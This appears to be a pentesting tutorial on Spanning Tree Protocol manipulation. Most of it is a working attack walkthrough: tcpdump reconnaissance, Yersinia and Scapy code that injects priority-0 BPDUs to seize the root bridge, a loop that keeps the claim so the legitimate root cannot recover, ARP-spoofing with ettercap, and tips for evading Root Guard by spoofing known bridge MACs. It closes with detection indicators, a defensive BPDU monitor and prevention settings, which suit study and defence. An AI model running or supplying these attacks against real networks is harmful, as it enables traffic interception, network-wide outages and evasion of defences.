STP Manipulation

Understanding STP Manipulation - Network Topology Control

What is STP Manipulation?

Simple Definition: STP manipulation is an attack that tricks network switches into changing their forwarding paths by becoming the “root bridge,” forcing all network traffic to flow through the attacker’s system for interception and analysis.

Technical Definition: Spanning Tree Protocol (STP) manipulation exploits the root bridge election process by sending Bridge Protocol Data Units (BPDUs) with superior priority values, causing legitimate switches to recalculate their topology and forward traffic through the attacker-controlled path.

Why STP Manipulation Works

STP manipulation succeeds due to protocol design characteristics:

  • Trust-Based Protocol: STP assumes all BPDUs are legitimate without authentication
  • Automatic Recalculation: Switches automatically adjust topology when receiving “better” bridge information
  • Lowest Priority Wins: Root bridge selection uses simple numeric comparison (lowest wins)
  • No Source Verification: Switches don’t verify the legitimacy of BPDU senders

Attack Process Breakdown

Normal STP Operation

  1. Bridge ID Advertisement: All switches send BPDUs claiming their Bridge Priority + MAC Address
  2. Root Election: Switch with lowest Bridge ID becomes root bridge
  3. Path Calculation: All switches calculate shortest path to root
  4. Port Blocking: Redundant paths blocked to prevent loops
  5. Traffic Flow: All inter-VLAN traffic flows through root bridge

STP Manipulation Attack

  1. BPDU Injection: Attacker sends BPDUs with priority 0 (lowest possible)
  2. Topology Disruption: Legitimate switches recognize attacker as new root
  3. Path Recalculation: Switches recalculate forwarding paths through attacker
  4. Traffic Redirection: All network traffic flows through attacker’s system
  5. Man-in-the-Middle Position: Attacker intercepts and forwards all communications

Real-World Impact

Complete Network Interception: All traffic between VLANs and network segments flows through attacker

Corporate Network Compromise: Intercept management traffic, database connections, file transfers

Network Performance Degradation: Forcing traffic through suboptimal path causes delays

Topology Disruption: Legitimate network convergence and failover mechanisms compromised

Stealth Persistence: Attack continues until network is properly secured or devices restarted

Technical Concepts

Spanning Tree Protocol Fundamentals

Purpose: Prevents Layer 2 loops while maintaining redundancy in switched networks

Bridge Protocol Data Units (BPDUs):

  • Configuration BPDUs: Normal STP operation; carry the root ID, path cost and sender bridge ID
  • Topology Change Notification (TCN) BPDUs: Signal that a topology change occurred

Root Bridge: Single switch that serves as the topology reference point

Bridge ID Structure:

  • Bridge Priority: 2-byte value (0-65535, default 32768; on switches using the 802.1t extended system ID only the top four bits are configurable, in steps of 4096, and the low 12 bits carry the VLAN or instance ID, which is why captures show values such as 8001 for VLAN 1)
  • MAC Address: 6-byte hardware address
  • Combined: Lower Bridge ID wins root election

Root Bridge Election Process

Election Criteria (in order):

  1. Lowest Bridge Priority
  2. Lowest MAC Address (if priority tied)

Port Roles:

  • Root Port: Best path to root bridge
  • Designated Port: Forwards traffic on segment
  • Blocked Port: Prevents loops, doesn’t forward

STP Variants and Compatibility

Common Protocols:

  • STP (802.1D): Original standard
  • RSTP (802.1w): Rapid convergence
  • MSTP (802.1s): Multiple instances
  • PVST+: Per-VLAN spanning tree

Attack Compatibility: Basic BPDU manipulation works across all STP variants

Technical Implementation

Prerequisites

Network Requirements:

  • Layer 2 network access with STP enabled
  • Switch ports configured for STP participation
  • Knowledge of current network topology

Essential Tools:

  • Yersinia: Comprehensive STP attack framework
  • Scapy: Custom BPDU crafting
  • Tcpdump: BPDU monitoring and verification
  • Brctl: Bridge utilities for Linux

Essential Command Sequence

Step 1: STP Reconnaissance

# Monitor existing BPDU traffic
tcpdump -nn -v -i eth0 -s 1500 'stp'
# Captures spanning tree BPDUs
# Reveals current root bridge and topology
# Shows bridge priorities and MAC addresses

# Analyze current root bridge
tcpdump -nn -v -i eth0 'stp' | head -20
# Look for "root-id" in the decoded output
# Identifies current root bridge priority and MAC
# Note: the lowest (priority, MAC) pair is the current root

# Check if STP is active
# If BPDUs are visible, STP is running on this port; this does not prove the port is
# unprotected, since Root Guard and BPDU Guard act on BPDUs the switch receives
# Note current convergence timing for attack planning

Purpose: Understand current STP topology and identify optimal attack parameters to successfully claim root bridge status.

Step 2: Bridge Priority Assessment

# Capture and decode BPDU details
tcpdump -nn -x -i eth0 'stp'
# -x: Show packet content in hex
# Decode bridge priority values
# Identify lowest priority currently in use

# Monitor topology convergence time
tcpdump -tt -i eth0 'stp' | head -10
# -tt: Show absolute timestamps
# Measure time between topology changes
# Important for timing attack injection

Purpose: Determine current bridge priorities and convergence timing to craft effective attack BPDUs.

Step 3: Execute Root Bridge Takeover

Using Yersinia:

# Launch Yersinia interactive interface
yersinia -I
# Select: STP protocol
# Choose: "claiming root role" attack
# Automatically sends BPDUs with priority 0

# Command-line root bridge attack
yersinia stp -attack 1
# Attack 1: Claim root bridge role
# Sends continuous BPDUs with lowest priority
# Forces topology recalculation through attacker

Manual BPDU Crafting with Scapy:

#!/usr/bin/env python3
import time
from scapy.all import Dot3, LLC, STP, sendp

# Craft a BPDU claiming root. BPDUs travel in 802.3/LLC frames (DSAP/SSAP 0x42),
# so the frame is built on Dot3 rather than Ether (Ethernet II); Scapy's STP
# layer names the root path cost field "pathcost".
bpdu = Dot3(dst="01:80:c2:00:00:00")/LLC()/STP(
    rootid=0,          # Claim priority 0 (lowest)
    bridgeid=0,        # Our bridge priority 0
    portid=0x8001,     # Port identifier
    pathcost=0         # Cost to root (we are root)
)

# Send BPDUs continuously
while True:
    sendp(bpdu, iface="eth0", verbose=False)
    time.sleep(2)  # Send every 2 seconds (the default hello time)

Linux Bridge Configuration (alternative method):

# Configure local bridge with low priority
brctl addbr br0
brctl addif br0 eth0
ifconfig br0 up

# Set extremely low bridge priority
echo 0 > /sys/class/net/br0/bridge/priority
# Priority 0 should win root election
# Monitor with tcpdump to verify success

Step 4: Verify Root Bridge Status

# Monitor for topology change
tcpdump -nn -v -i eth0 'stp' | grep -i "root"
# Should show attacker MAC as new root
# Topology Change Notifications indicate success

# Check traffic redirection
tcpdump -nn -c 100 -i eth0 not arp and not host "$(hostname -I | awk '{print $1}')"
# hostname -I can print several addresses; only the first is used so the filter stays valid
# If seeing significant inter-VLAN traffic:
# Attack successful, traffic routing through attacker

# Verify forwarding is working
ping 8.8.8.8
# Should work if properly forwarding traffic
# Broken connectivity indicates misconfiguration

Purpose: Confirm successful root bridge takeover and verify traffic is flowing through attacker system.

Step 5: Maintain Root Bridge Status

# Continuous BPDU transmission
while true; do
    yersinia stp -attack 1 &
    sleep 30  # Refresh every 30 seconds
    killall yersinia
done
# Maintains root bridge claim
# Prevents legitimate root from recovering

# Monitor for competing BPDUs
tcpdump -nn -v -i eth0 'stp' | grep -E "(priority|bridge)"
# Watch for other devices claiming lower priority
# Adjust attack if necessary

Purpose: Sustain root bridge position and prevent legitimate topology recovery.

Attack Variations

Topology Change Attacks

# Generate topology change notifications
yersinia stp -attack 4
# Forces MAC address table flushing
# Creates network disruption and monitoring opportunities
# Useful combined with other Layer 2 attacks

# Custom topology change notifications
tcpdump -w - -i eth0 'stp' | head -c 200 | \
sed 's/\x00\x00/\x80\x01/' | tcpdump -r -
# Rewrites bytes in the captured pcap stream and decodes the result for display only;
# tcpdump -r reads a capture, so nothing modified is transmitted on the wire

Selective VLAN STP Attacks

# Target specific VLAN instances (PVST+)
yersinia stp -attack 1 -vlan 100
# Claims root for specific VLAN only
# More targeted than global root takeover
# Useful for specific VLAN compromise

Bridge ID Spoofing

# Spoof legitimate bridge MAC addresses
yersinia stp -attack 1 -source 00:1a:2b:3c:4d:5e
# Uses specific MAC address for bridge ID
# Can impersonate legitimate network equipment
# Harder to detect than random MAC addresses

Common Issues and Solutions

Problem: BPDUs sent but topology doesn’t change

  • Solution: Verify STP enabled on network, check for STP security features like Root Guard

Problem: Network connectivity lost after attack

  • Solution: Enable IP forwarding, configure bridging properly, ensure attacker forwards traffic

Problem: Attack detected and port disabled

  • Solution: Use legitimate-looking bridge priorities, vary timing, spoof known bridge MACs

Problem: Only affecting single VLAN

  • Solution: Attack may only work on PVST+ networks, try targeting multiple VLAN instances

Advanced Techniques

Combining with Other Attacks

# STP manipulation + ARP spoofing
# Step 1: Become root bridge (all traffic flows through)
yersinia stp -attack 1 &
# Step 2: ARP spoof for granular control
ettercap -T -M arp:remote /192.168.1.100// /192.168.1.1//

RSTP Rapid Convergence Abuse

# Exploit rapid convergence for faster attacks
# Send Proposal/Agreement BPDUs
# Forces immediate topology change
# More effective against RSTP networks

Detection and Prevention

Detection Indicators

  • Unexpected BPDUs from non-switch devices
  • Frequent topology change notifications
  • New root bridge appearing suddenly
  • Network performance degradation
  • Root bridge with MAC address not matching known infrastructure
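As an added example (not code from the original page), a small Python decoder and monitor that turns the indicators above into checks: it parses the 802.3/LLC BPDU layout using the bridge ID structure and lowest-wins election rule from the Technical Concepts section, and flags BPDUs from unknown senders, a root claim superior to the authorised root, and a burst of topology changes. The expected root, known-bridge list and all frames are constructed values; on a real network the frames would come from a raw socket or a pcap matching the tcpdump 'stp' filter.

```python
import struct

STP_MCAST = bytes.fromhex("0180c2000000")  # 01:80:c2:00:00:00, the BPDU destination group
LLC_STP = b"\x42\x42\x03"                   # DSAP/SSAP 0x42, UI control: LLC header before STP
CONFIG_BPDU, TCN_BPDU, FLAG_TC = 0x00, 0x80, 0x01  # BPDU types; TC flag bit in config BPDUs

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_bpdu(frame):
    """Decode an 802.3/LLC STP frame (what tcpdump 'stp' matches) into a dict, or None.
    Bridge IDs become (priority, MAC) tuples, so the lower tuple is the election winner."""
    if len(frame) < 21 or frame[:6] != STP_MCAST or frame[14:17] != LLC_STP:
        return None
    proto, _ver, btype = struct.unpack("!HBB", frame[17:21])
    bpdu = {"src": mac_str(frame[6:12]), "type": btype, "flags": 0}
    if proto == 0 and btype == TCN_BPDU:           # TCN BPDUs carry no bridge IDs or cost
        return bpdu
    if proto != 0 or btype != CONFIG_BPDU or len(frame) < 52:
        return None
    flags, rp, rm, cost, bp, bm = struct.unpack("!BH6sIH6s", frame[21:42])
    bpdu.update(flags=flags, root=(rp, mac_str(rm)), cost=cost, bridge=(bp, mac_str(bm)))
    return bpdu

class StpMonitor:
    """Alerts on unknown BPDU senders, root claims superior to the authorised root, and TC bursts."""
    def __init__(self, expected_root, known_bridges, tc_limit=3):
        self.expected_root, self.known, self.tc_limit = expected_root, set(known_bridges), tc_limit
        self.tc_seen = 0

    def feed(self, frame):
        b, alerts = parse_bpdu(frame), []
        if b is None:
            return alerts
        if b["src"] not in self.known:
            alerts.append(f"BPDU from unknown bridge {b['src']}")
        if b["type"] == TCN_BPDU or b["flags"] & FLAG_TC:
            self.tc_seen += 1
            if self.tc_seen > self.tc_limit:
                alerts.append(f"{self.tc_seen} topology changes seen, limit is {self.tc_limit}")
        if b["type"] == CONFIG_BPDU and b["root"] < self.expected_root:
            alerts.append(f"superior root claim {b['root']} beats expected {self.expected_root}")
        return alerts

def config_bpdu(src, root, bridge, flags=0, cost=0):
    """Constructed test frame (not a real capture) in the same layout parse_bpdu decodes."""
    hexmac = lambda m: bytes.fromhex(m.replace(":", ""))
    stp = struct.pack("!HBBBH6sIH6sHHHHH", 0, 0, CONFIG_BPDU, flags, root[0], hexmac(root[1]),
                      cost, bridge[0], hexmac(bridge[1]), 0x8001, 0, 20 << 8, 2 << 8, 15 << 8)
    return STP_MCAST + hexmac(src) + struct.pack("!H", len(LLC_STP) + len(stp)) + LLC_STP + stp
```

A priority-0 claim from a MAC outside the known-bridge list produces two alerts at once, which is the signature of the root takeover described earlier.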

Prevention Measures

Root Guard:

  • Prevents unauthorized root bridge elections
  • Configured on designated ports that should never become root ports (ports facing access switches and untrusted segments)
  • Puts the port into the root-inconsistent (blocking) state when a superior BPDU arrives; the port recovers automatically once the superior BPDUs stop

BPDU Guard:

  • Immediately shuts down (err-disables) ports that receive any BPDU
  • Applied to access ports connecting end devices
  • Prevents BPDU injection attacks; the port stays down until errdisable recovery or a manual re-enable

Bridge ID Security:

  • Configure explicit bridge priorities on infrastructure
  • Use very low priorities on intended root bridges
  • Monitor for unexpected bridge priority changes

STP Security Features:

  • Enable PortFast on access ports, paired with BPDU Guard (PortFast alone only skips the listening and learning states)
  • Implement BPDU filtering with care: it silences STP on the port entirely, so a loop through that port goes undetected
  • Use RSTP for faster convergence and better security; note that RSTP adds no BPDU authentication, so Root Guard and BPDU Guard remain necessary

Professional Context

Legitimate Use Cases

  • Network Testing: Validating STP security configurations
  • Topology Analysis: Understanding network convergence behavior
  • Disaster Recovery: Testing failover and recovery procedures
  • Security Assessment: Identifying weak STP implementations

Legal and Ethical Requirements

Authorization: STP attacks can severely disrupt network operations; explicit written permission is essential

Impact Assessment: Document potential for network-wide outages and service disruption

Recovery Plan: Ensure ability to restore normal STP operation quickly

Scope Definition: Clearly identify which network segments are in-scope for STP testing


STP manipulation attacks highlight the critical importance of securing Layer 2 infrastructure protocols, as compromise can provide network-wide visibility and control over traffic flows.